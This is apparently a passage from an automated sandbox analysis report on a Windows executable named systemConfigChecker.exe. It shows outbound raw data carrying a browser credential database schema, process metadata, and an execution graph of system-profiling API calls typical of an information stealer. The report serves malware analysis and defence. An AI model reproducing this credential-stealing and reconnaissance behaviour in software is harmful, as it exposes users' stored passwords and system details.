        Dec 6, 2024 10:58:51.585362911 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585485935 CET4944OUTData Raw: 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 70 61 73 73 77 6f 72 64 5f 6e 6f 74 65 73 5f 31 70 61 73 73 77 6f 72 64 5f 6e 6f 74 65 73 10 00 00 00 08 00 00 00 00 74 0b 07 17 2f 35 01 81 11 69 6e 64 65 78 66 6f 72 65 69 67 6e 5f 6b 65 79 5f 69 6e 64 65
        Data Ascii: te_autoindex_password_notes_1password_notest/5indexforeign_key_indexinsecure_credentialsCREATE INDEX foreign_key_index ON insecure_credentials (parent_id)G[5indexsqlite_autoindex_insecure_credentials_1insecure_credentials


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:04:58:47
        Start date:06/12/2024
        Path:C:\Users\user\Desktop\systemConfigChecker.exe
        Wow64 process (32bit):false
        Commandline:"C:\Users\user\Desktop\systemConfigChecker.exe"
        Imagebase:0x7ff6b2700000
        File size:81'920 bytes
        MD5 hash:218954F9DD70247E51AF8A30940D5C33
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:1
        Start time:04:58:47
        Start date:06/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff75da10000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:32.3%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:39.5%
          Total number of Nodes:653
          Total number of Limit Nodes:11
          execution_graph 3785 7ff6b2707330 3786 7ff6b270735d 3785->3786 3787 7ff6b2707356 3785->3787 3786->3787 3790 7ff6b2707405 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3786->3790 3791 7ff6b27073e3 fputc 3786->3791 3788 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3787->3788 3789 7ff6b27074d6 3788->3789 3792 7ff6b2707474 3790->3792 3793 7ff6b270744a 3790->3793 3791->3787 3792->3787 3795 7ff6b2707483 fwrite 3792->3795 3793->3792 3794 7ff6b270744f 3793->3794 3794->3787 3796 7ff6b2707454 fputc 3794->3796 3795->3787 3796->3787 3640 7ff6b270c9bc 3641 7ff6b270c9dc 3640->3641 3642 7ff6b270c9cf 3640->3642 3644 7ff6b2708450 3642->3644 3645 7ff6b270848f 3644->3645 3646 7ff6b2708463 3644->3646 3645->3641 3647 7ff6b2708487 3646->3647 3648 7ff6b27084a8 _invalid_parameter_noinfo_noreturn 3646->3648 3649 7ff6b270b500 _Receive_impl free 3647->3649 3649->3645 3175 7ff6b2706da0 3176 7ff6b2706dc2 3175->3176 3177 7ff6b2706db7 3175->3177 3178 7ff6b2706dc9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3176->3178 3179 7ff6b2706dd8 3176->3179 3178->3179 3180 7ff6b2706dfd memcpy 3179->3180 3185 7ff6b2706e32 3179->3185 3180->3185 3181 7ff6b2706ece 3182 7ff6b2706eae 3182->3181 3184 7ff6b2706eb3 fread 3182->3184 3183 7ff6b2706e80 fread 3183->3181 3183->3185 3184->3181 3185->3181 3185->3182 3185->3183 3689 7ff6b2701220 __std_exception_destroy 3797 7ff6b2703720 3798 7ff6b2707c10 _Receive_impl 3 API calls 3797->3798 3799 7ff6b2703762 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3798->3799 3638 7ff6b2709bd0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3690 7ff6b2708750 3691 7ff6b2707c10 _Receive_impl 3 API calls 3690->3691 3692 7ff6b2708764 3691->3692 3693 7ff6b2708776 3692->3693 3694 7ff6b270b500 _Receive_impl free 3692->3694 3694->3693 3695 7ff6b270b950 3699 7ff6b270c150 SetUnhandledExceptionFilter 3695->3699 3186 7ff6b2707a10 3188 7ff6b2707a38 3186->3188 3199 7ff6b2707a3d 3186->3199 3187 7ff6b2707af7 3189 7ff6b270b508 std::_Facet_Register 3 API calls 3187->3189 3188->3187 3190 7ff6b2707aab 3188->3190 3192 7ff6b2707ab9 3188->3192 3193 7ff6b2707ac6 3188->3193 3188->3199 3189->3190 3191 7ff6b2707b10 memcpy 3190->3191 3197 7ff6b2707bde _invalid_parameter_noinfo_noreturn 3190->3197 3201 7ff6b2707b4b 3191->3201 3192->3193 3194 7ff6b2707c03 3192->3194 3193->3199 3203 7ff6b270b508 3193->3203 3215 7ff6b2701270 3194->3215 3197->3199 3198 7ff6b2707c08 3200 7ff6b2707bb0 3212 7ff6b270b500 3200->3212 3201->3197 3201->3199 3201->3200 3204 7ff6b270b522 malloc 3203->3204 3205 7ff6b270b52c 3204->3205 3206 7ff6b270b513 3204->3206 3205->3190 3206->3204 3207 7ff6b270b532 3206->3207 3208 7ff6b270b53d 3207->3208 3218 7ff6b270bca4 3207->3218 3210 7ff6b2701270 Concurrency::cancel_current_task __std_exception_copy 3208->3210 3211 7ff6b270b543 3210->3211 3213 7ff6b270bc7c free 3212->3213 3216 7ff6b270127e Concurrency::cancel_current_task 3215->3216 3217 7ff6b270128f __std_exception_copy 3216->3217 3217->3198 3221 7ff6b270bc84 3218->3221 3220 7ff6b270bcb2 _CxxThrowException 3221->3220 3653 7ff6b2706990 3654 7ff6b27069d0 3653->3654 3655 7ff6b27069a3 3653->3655 3655->3654 3656 7ff6b27069b3 fflush 3655->3656 3700 7ff6b2707610 3701 7ff6b2707621 3700->3701 3702 7ff6b270764e 3700->3702 3703 7ff6b2707646 3701->3703 3704 7ff6b2707661 _invalid_parameter_noinfo_noreturn 3701->3704 3705 7ff6b270b500 _Receive_impl free 3703->3705 3706 7ff6b270767e 3704->3706 3705->3702 3804 7ff6b2707510 3805 7ff6b2707523 3804->3805 3806 7ff6b270751c _lock_file 3804->3806 3806->3805 3807 7ff6b270b85c 3808 7ff6b270b87e 3807->3808 3809 7ff6b270b874 3807->3809 3810 7ff6b270b500 _Receive_impl free 3809->3810 3810->3808 3811 7ff6b270c65e ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 3764 7ff6b270bae8 3767 7ff6b270c1bc 3764->3767 3768 7ff6b270c1df GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3767->3768 3769 7ff6b270baf1 3767->3769 3768->3769 3222 7ff6b2701000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3223 7ff6b270b508 std::_Facet_Register 3 API calls 3222->3223 3224 7ff6b270107b ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3223->3224 3225 7ff6b27010f2 3224->3225 3812 7ff6b2707d00 3815 7ff6b2707d3b 3812->3815 3813 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3814 7ff6b2707e5a 3813->3814 3815->3813 3261 7ff6b270b96c 3262 7ff6b270b985 3261->3262 3263 7ff6b270b98d __scrt_acquire_startup_lock 3262->3263 3264 7ff6b270bac3 3262->3264 3266 7ff6b270bacd 3263->3266 3267 7ff6b270b9ab __scrt_release_startup_lock 3263->3267 3449 7ff6b270bfac IsProcessorFeaturePresent 3264->3449 3268 7ff6b270bfac 9 API calls 3266->3268 3270 7ff6b270b9d0 3267->3270 3272 7ff6b270ba56 _get_initial_narrow_environment __p___argv __p___argc 3267->3272 3275 7ff6b270ba4e _register_thread_local_exe_atexit_callback 3267->3275 3269 7ff6b270bad8 3268->3269 3271 7ff6b270bae0 _exit 3269->3271 3281 7ff6b2705d80 GetConsoleWindow ShowWindow 3272->3281 3275->3272 3278 7ff6b270ba83 3279 7ff6b270ba88 _cexit 3278->3279 3280 7ff6b270ba8d 3278->3280 3279->3280 3280->3270 3455 7ff6b2709610 3281->3455 3283 7ff6b2705e03 3459 7ff6b2704a40 3283->3459 3287 7ff6b2705e1a 3288 7ff6b2705e5b 3287->3288 3289 7ff6b2705e56 3287->3289 3291 7ff6b2705e4f _invalid_parameter_noinfo_noreturn 3287->3291 3290 7ff6b2709610 memcpy 3288->3290 3292 7ff6b270b500 _Receive_impl free 3289->3292 3293 7ff6b2705e71 3290->3293 3291->3289 3292->3288 3508 7ff6b2704640 GetLocaleInfoA 3293->3508 3296 7ff6b27083c0 memcpy 3297 7ff6b2705e88 3296->3297 3298 7ff6b2705ec9 3297->3298 3300 7ff6b2705ec4 3297->3300 3302 7ff6b2705ebd _invalid_parameter_noinfo_noreturn 3297->3302 3299 7ff6b2709610 memcpy 3298->3299 3301 7ff6b2705edf 3299->3301 3303 7ff6b270b500 _Receive_impl free 3300->3303 3544 7ff6b2703560 GetSystemInfo memset 3301->3544 3302->3300 3303->3298 3306 7ff6b27083c0 memcpy 3307 7ff6b2705ef6 3306->3307 3308 7ff6b2705f37 3307->3308 3309 7ff6b2705f32 3307->3309 3311 7ff6b2705f2b _invalid_parameter_noinfo_noreturn 3307->3311 3310 7ff6b2709610 memcpy 3308->3310 3312 7ff6b270b500 _Receive_impl free 3309->3312 3313 7ff6b2705f4d GlobalMemoryStatusEx memset 3310->3313 3311->3309 3312->3308 3561 7ff6b2706810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3313->3561 3315 7ff6b2705f7a 3562 7ff6b27099f0 3315->3562 3318 7ff6b27099f0 9 API calls 3319 7ff6b2705faf 3318->3319 3320 7ff6b2706048 3319->3320 3581 7ff6b27096c0 3319->3581 3576 7ff6b2707c10 3320->3576 3323 7ff6b2706078 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3324 7ff6b27083c0 memcpy 3323->3324 3325 7ff6b270609e 3324->3325 3326 7ff6b27060dc 3325->3326 3328 7ff6b270676e _invalid_parameter_noinfo_noreturn 3325->3328 3329 7ff6b270b500 _Receive_impl free 3325->3329 3327 7ff6b2709610 memcpy 3326->3327 3330 7ff6b27060f2 3327->3330 3332 7ff6b2706775 3328->3332 3329->3326 3331 7ff6b2703780 48 API calls 3330->3331 3334 7ff6b27060fc 3331->3334 3333 7ff6b270b500 _Receive_impl free 3332->3333 3335 7ff6b270677a 3333->3335 3336 7ff6b27083c0 memcpy 3334->3336 3337 7ff6b27067cc 3335->3337 3339 7ff6b27067c7 3335->3339 3343 7ff6b27067c0 _invalid_parameter_noinfo_noreturn 3335->3343 3338 7ff6b2706109 3336->3338 3340 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3337->3340 3341 7ff6b270614a 3338->3341 3342 7ff6b2706145 3338->3342 3347 7ff6b270613e _invalid_parameter_noinfo_noreturn 3338->3347 3345 7ff6b270b500 _Receive_impl free 3339->3345 3346 7ff6b27067dd 3340->3346 3344 7ff6b2709610 memcpy 3341->3344 3348 7ff6b270b500 _Receive_impl free 3342->3348 3343->3339 3349 7ff6b2706160 3344->3349 3345->3337 3447 7ff6b270c0fc GetModuleHandleW 3346->3447 3347->3342 3348->3341 3350 7ff6b2703aa0 38 API calls 3349->3350 3351 7ff6b270616a 3350->3351 3352 7ff6b27083c0 memcpy 3351->3352 3353 7ff6b2706177 3352->3353 3354 7ff6b27061b8 3353->3354 3356 7ff6b27061b3 3353->3356 3358 7ff6b27061ac _invalid_parameter_noinfo_noreturn 3353->3358 3355 7ff6b2704e50 28 API calls 3354->3355 3357 7ff6b27061c1 3355->3357 3359 7ff6b270b500 _Receive_impl free 3356->3359 3360 7ff6b27067fe 3357->3360 3367 7ff6b27061e0 3357->3367 3358->3356 3359->3354 3362 7ff6b2701310 ?_Xlength_error@std@@YAXPEBD 3360->3362 3361 7ff6b2706288 memcpy 3363 7ff6b2709610 memcpy 3361->3363 3365 7ff6b2706803 3362->3365 3366 7ff6b27062d9 3363->3366 3364 7ff6b270621b 3369 7ff6b270b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3364->3369 3372 7ff6b2701270 Concurrency::cancel_current_task __std_exception_copy 3365->3372 3368 7ff6b27083c0 memcpy 3366->3368 3367->3361 3367->3364 3370 7ff6b270626d 3367->3370 3371 7ff6b270627c 3367->3371 3374 7ff6b2706234 3367->3374 3378 7ff6b270630b 3368->3378 3369->3374 3370->3364 3370->3365 3373 7ff6b270b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3371->3373 3375 7ff6b2706809 3372->3375 3373->3374 3374->3361 3376 7ff6b270637f _invalid_parameter_noinfo_noreturn 3374->3376 3377 7ff6b2706386 3376->3377 3382 7ff6b270b500 _Receive_impl free 3377->3382 3379 7ff6b2706347 3378->3379 3381 7ff6b270634c 3378->3381 3384 7ff6b2706340 _invalid_parameter_noinfo_noreturn 3378->3384 3385 7ff6b270b500 _Receive_impl free 3379->3385 3380 7ff6b270638b 3383 7ff6b2709610 memcpy 3380->3383 3381->3376 3381->3377 3381->3380 3382->3380 3386 7ff6b27063a1 3383->3386 3384->3379 3385->3381 3387 7ff6b2703cd0 59 API calls 3386->3387 3388 7ff6b27063ab 3387->3388 3389 7ff6b27083c0 memcpy 3388->3389 3390 7ff6b27063b8 3389->3390 3391 7ff6b27063f9 3390->3391 3393 7ff6b27063f4 3390->3393 3395 7ff6b27063ed _invalid_parameter_noinfo_noreturn 3390->3395 3392 7ff6b2709610 memcpy 3391->3392 3394 7ff6b270640f 3392->3394 3396 7ff6b270b500 _Receive_impl free 3393->3396 3397 7ff6b2703f60 58 API calls 3394->3397 3395->3393 3396->3391 3398 7ff6b2706419 3397->3398 3399 7ff6b27083c0 memcpy 3398->3399 3400 7ff6b2706426 3399->3400 3401 7ff6b2706467 3400->3401 3402 7ff6b2706462 3400->3402 3404 7ff6b270645b _invalid_parameter_noinfo_noreturn 3400->3404 3403 7ff6b2704180 58 API calls 3401->3403 3405 7ff6b270b500 _Receive_impl free 3402->3405 3406 7ff6b2706471 3403->3406 3404->3402 3405->3401 3407 7ff6b27083c0 memcpy 3406->3407 3408 7ff6b270647e 3407->3408 3409 7ff6b27064bf memset 3408->3409 3410 7ff6b27064ba 3408->3410 3412 7ff6b27064b3 _invalid_parameter_noinfo_noreturn 3408->3412 3411 7ff6b2706810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3409->3411 3413 7ff6b270b500 _Receive_impl free 3410->3413 3414 7ff6b27064d9 GetModuleFileNameA 3411->3414 3412->3410 3413->3409 3415 7ff6b27099f0 9 API calls 3414->3415 3416 7ff6b27064ff 3415->3416 3417 7ff6b27099f0 9 API calls 3416->3417 3418 7ff6b270650e 3417->3418 3419 7ff6b27099f0 9 API calls 3418->3419 3420 7ff6b270651d 3419->3420 3421 7ff6b27065b6 3420->3421 3422 7ff6b27096c0 8 API calls 3420->3422 3423 7ff6b2707c10 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3421->3423 3422->3421 3424 7ff6b27065df ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3423->3424 3425 7ff6b27083c0 memcpy 3424->3425 3426 7ff6b2706605 3425->3426 3427 7ff6b2706643 3426->3427 3429 7ff6b270672c _invalid_parameter_noinfo_noreturn 3426->3429 3430 7ff6b270b500 _Receive_impl free 3426->3430 3428 7ff6b2709610 memcpy 3427->3428 3431 7ff6b2706659 3428->3431 3433 7ff6b2706733 3429->3433 3430->3427 3432 7ff6b2704390 42 API calls 3431->3432 3434 7ff6b2706663 3432->3434 3435 7ff6b270b500 _Receive_impl free 3433->3435 3436 7ff6b27083c0 memcpy 3434->3436 3440 7ff6b270673b 3435->3440 3437 7ff6b2706670 3436->3437 3438 7ff6b27066b1 3437->3438 3439 7ff6b27066ac 3437->3439 3443 7ff6b27066a5 _invalid_parameter_noinfo_noreturn 3437->3443 3441 7ff6b2705510 51 API calls 3438->3441 3444 7ff6b270b500 _Receive_impl free 3439->3444 3440->3328 3440->3332 3440->3335 3442 7ff6b27066c7 3441->3442 3445 7ff6b2701b50 175 API calls 3442->3445 3443->3439 3444->3438 3446 7ff6b27066ea 3445->3446 3446->3429 3446->3433 3446->3440 3448 7ff6b270ba7f 3447->3448 3448->3269 3448->3278 3450 7ff6b270bfd2 3449->3450 3451 7ff6b270bfe0 memset RtlCaptureContext RtlLookupFunctionEntry 3450->3451 3452 7ff6b270c056 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3451->3452 3453 7ff6b270c01a RtlVirtualUnwind 3451->3453 3454 7ff6b270c0d6 3452->3454 3453->3452 3454->3266 3456 7ff6b2709672 3455->3456 3457 7ff6b2709633 memcpy 3455->3457 3456->3283 3457->3283 3601 7ff6b270c530 3459->3601 3463 7ff6b2704af1 RegOpenKeyExA 3464 7ff6b2704b1d RegGetValueA 3463->3464 3465 7ff6b2704b97 RegOpenKeyExA 3463->3465 3468 7ff6b2704b84 RegCloseKey 3464->3468 3469 7ff6b2704b56 3464->3469 3466 7ff6b2704bc2 RegGetValueA 3465->3466 3467 7ff6b2704c3c RegOpenKeyExA 3465->3467 3470 7ff6b2704bfb 3466->3470 3471 7ff6b2704c29 RegCloseKey 3466->3471 3472 7ff6b2704c6b RegGetValueA 3467->3472 3483 7ff6b2704d4c 3467->3483 3468->3465 3473 7ff6b27099f0 9 API calls 3469->3473 3477 7ff6b27099f0 9 API calls 3470->3477 3471->3467 3474 7ff6b2704ca4 3472->3474 3475 7ff6b2704cd2 RegGetValueA 3472->3475 3476 7ff6b2704b66 3473->3476 3478 7ff6b27099f0 9 API calls 3474->3478 3480 7ff6b2704d0b 3475->3480 3481 7ff6b2704d39 RegCloseKey 3475->3481 3479 7ff6b27099f0 9 API calls 3476->3479 3482 7ff6b2704c0b 3477->3482 3484 7ff6b2704cb4 3478->3484 3485 7ff6b2704b75 3479->3485 3486 7ff6b27099f0 9 API calls 3480->3486 3481->3483 3487 7ff6b27099f0 9 API calls 3482->3487 3490 7ff6b2704dd9 3483->3490 3494 7ff6b27096c0 8 API calls 3483->3494 3488 7ff6b27099f0 9 API calls 3484->3488 3489 7ff6b27099f0 9 API calls 3485->3489 3491 7ff6b2704d1b 3486->3491 3492 7ff6b2704c1a 3487->3492 3493 7ff6b2704cc3 3488->3493 3489->3468 3495 7ff6b2707c10 _Receive_impl 3 API calls 3490->3495 3496 7ff6b27099f0 9 API calls 3491->3496 3497 7ff6b27099f0 9 API calls 3492->3497 3498 7ff6b27099f0 9 API calls 3493->3498 3494->3490 3499 7ff6b2704e0b ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3495->3499 3500 7ff6b2704d2a 3496->3500 3497->3471 3498->3475 3501 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3499->3501 3502 7ff6b27099f0 9 API calls 3500->3502 3503 7ff6b2704e31 3501->3503 3502->3481 3504 7ff6b27083c0 3503->3504 3505 7ff6b27083d7 3504->3505 3506 7ff6b2708433 3505->3506 3507 7ff6b270840a memcpy 3505->3507 3506->3287 3507->3287 3509 7ff6b27046a2 3508->3509 3510 7ff6b27046c7 3508->3510 3604 7ff6b270a0c0 3509->3604 3513 7ff6b270a0c0 7 API calls 3510->3513 3512 7ff6b27046c2 3515 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3512->3515 3514 7ff6b27046ff GetLocaleInfoA 3513->3514 3517 7ff6b27047b0 3514->3517 3518 7ff6b2704728 3514->3518 3516 7ff6b2704797 3515->3516 3516->3296 3520 7ff6b270a0c0 7 API calls 3517->3520 3519 7ff6b270a0c0 7 API calls 3518->3519 3539 7ff6b2704748 3519->3539 3521 7ff6b27047e3 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3520->3521 3523 7ff6b27099f0 9 API calls 3521->3523 3522 7ff6b2704780 3525 7ff6b270b500 _Receive_impl free 3522->3525 3526 7ff6b270487e 3523->3526 3524 7ff6b2704a33 _invalid_parameter_noinfo_noreturn 3525->3512 3621 7ff6b270b250 3526->3621 3529 7ff6b27099f0 9 API calls 3530 7ff6b27048a9 3529->3530 3531 7ff6b270b250 9 API calls 3530->3531 3532 7ff6b27048c7 3531->3532 3533 7ff6b27099f0 9 API calls 3532->3533 3534 7ff6b27048d6 3533->3534 3535 7ff6b2704963 3534->3535 3536 7ff6b27096c0 8 API calls 3534->3536 3537 7ff6b2707c10 _Receive_impl 3 API calls 3535->3537 3536->3535 3538 7ff6b270498c ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3537->3538 3538->3539 3540 7ff6b27049ac 3538->3540 3539->3512 3539->3522 3539->3524 3541 7ff6b27049dc 3540->3541 3543 7ff6b27049d5 _invalid_parameter_noinfo_noreturn 3540->3543 3542 7ff6b270b500 _Receive_impl free 3541->3542 3542->3539 3543->3541 3636 7ff6b2706810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3544->3636 3546 7ff6b27035be 3547 7ff6b27099f0 9 API calls 3546->3547 3548 7ff6b27035cf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3547->3548 3549 7ff6b27099f0 9 API calls 3548->3549 3550 7ff6b27035ec 3549->3550 3551 7ff6b27099f0 9 API calls 3550->3551 3552 7ff6b27035fc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3551->3552 3553 7ff6b27099f0 9 API calls 3552->3553 3554 7ff6b2703618 3553->3554 3555 7ff6b27036a6 3554->3555 3556 7ff6b27096c0 8 API calls 3554->3556 3557 7ff6b2707c10 _Receive_impl 3 API calls 3555->3557 3556->3555 3558 7ff6b27036d8 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3557->3558 3559 7ff6b270b4e0 Concurrency::cancel_current_task 8 API calls 3558->3559 3560 7ff6b27036fe 3559->3560 3560->3306 3561->3315 3567 7ff6b2709a20 ?good@ios_base@std@ 3562->3567 3564 7ff6b2709aa1 3566 7ff6b2709aab ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3564->3566 3569 7ff6b2709afd ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3564->3569 3572 7ff6b2709ad5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3564->3572 3565 7ff6b2709a73 3565->3564 3570 7ff6b2709a89 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3565->3570 3571 7ff6b2709b8d ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3566->3571 3575 7ff6b2705f94 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3566->3575 3567->3564 3567->3565 3569->3566 3573 7ff6b2709b1a 3569->3573 3570->3564 3571->3575 3572->3564 3572->3566 3573->3566 3574 7ff6b2709b25 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3573->3574 3574->3566 3574->3573 3575->3318 3577 7ff6b2707c7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3576->3577 3579 7ff6b2707c29 3576->3579 3578 7ff6b2707cc0 _invalid_parameter_noinfo_noreturn 3577->3578 3579->3578 3580 7ff6b270b500 _Receive_impl free 3579->3580 3580->3577 3582 7ff6b27096dd memcpy 3581->3582 3586 7ff6b2709707 3581->3586 3582->3320 3584 7ff6b270980c 3637 7ff6b2701310 ?_Xlength_error@std@@YAXPEBD 3584->3637 3586->3584 3590 7ff6b2709799 3586->3590 3591 7ff6b2709761 3586->3591 3592 7ff6b2709753 3586->3592 3587 7ff6b2709811 3593 7ff6b2701270 Concurrency::cancel_current_task __std_exception_copy 3587->3593 3588 7ff6b270b508 std::_Facet_Register 3 API calls 3588->3592 3589 7ff6b27097a1 memcpy 3597 7ff6b27097ef 3589->3597 3598 7ff6b27097c2 3589->3598 3596 7ff6b270b508 std::_Facet_Register 3 API calls 3590->3596 3591->3587 3591->3588 3592->3589 3594 7ff6b2709805 _invalid_parameter_noinfo_noreturn 3592->3594 3595 7ff6b2709817 3593->3595 3594->3584 3596->3592 3597->3320 3598->3594 3599 7ff6b27097e7 3598->3599 3600 7ff6b270b500 _Receive_impl free 3599->3600 3600->3597 3602 7ff6b2704a5d memset memset memset memset memset 3601->3602 3603 7ff6b2706810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3602->3603 3603->3463 3605 7ff6b270a0e6 3604->3605 3606 7ff6b270a1b0 3604->3606 3608 7ff6b270a0ec memcpy 3605->3608 3609 7ff6b270a10b 3605->3609 3635 7ff6b2701310 ?_Xlength_error@std@@YAXPEBD 3606->3635 3608->3512 3610 7ff6b270a1b5 3609->3610 3611 7ff6b270a11c 3609->3611 3612 7ff6b270a137 memcpy 3609->3612 3616 7ff6b270a17c 3609->3616 3614 7ff6b2701270 Concurrency::cancel_current_task __std_exception_copy 3610->3614 3613 7ff6b270b508 std::_Facet_Register 3 API calls 3611->3613 3612->3512 3617 7ff6b270a132 3613->3617 3618 7ff6b270a1bb 3614->3618 3619 7ff6b270b508 std::_Facet_Register 3 API calls 3616->3619 3617->3612 3620 7ff6b270a175 _invalid_parameter_noinfo_noreturn 3617->3620 3619->3612 3620->3616 3623 7ff6b270b286 ?good@ios_base@std@ 3621->3623 3624 7ff6b270b2bf 3623->3624 3625 7ff6b270b2ed 3623->3625 3624->3625 3627 7ff6b270b2d5 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3624->3627 3626 7ff6b270b347 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3625->3626 3629 7ff6b270b31b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3625->3629 3630 7ff6b270b2f7 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3625->3630 3626->3630 3631 7ff6b270b337 3626->3631 3627->3625 3629->3625 3629->3631 3632 7ff6b270489a 3630->3632 3633 7ff6b270b3d1 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3630->3633 3631->3630 3634 7ff6b270b369 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3631->3634 3632->3529 3633->3632 3634->3630 3634->3631 3636->3546 3661 7ff6b270cfed _seh_filter_exe 3639 7ff6b2709df0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3816 7ff6b2708670 3821 7ff6b2707530 3816->3821 3824 7ff6b270754d 3821->3824 3822 7ff6b27075f5 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3823 7ff6b27075cc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3823->3822 3824->3822 3824->3823 3825 7ff6b27088f0 10 API calls 3824->3825 3826 7ff6b27075bf fclose 3825->3826 3826->3823 3827 7ff6b2708870 3832 7ff6b2708120 3827->3832 3829 7ff6b2708896 3830 7ff6b2708884 3830->3829 3831 7ff6b270b500 _Receive_impl free 3830->3831 3831->3829 3833 7ff6b2708177 3832->3833 3834 7ff6b2708141 3832->3834 3835 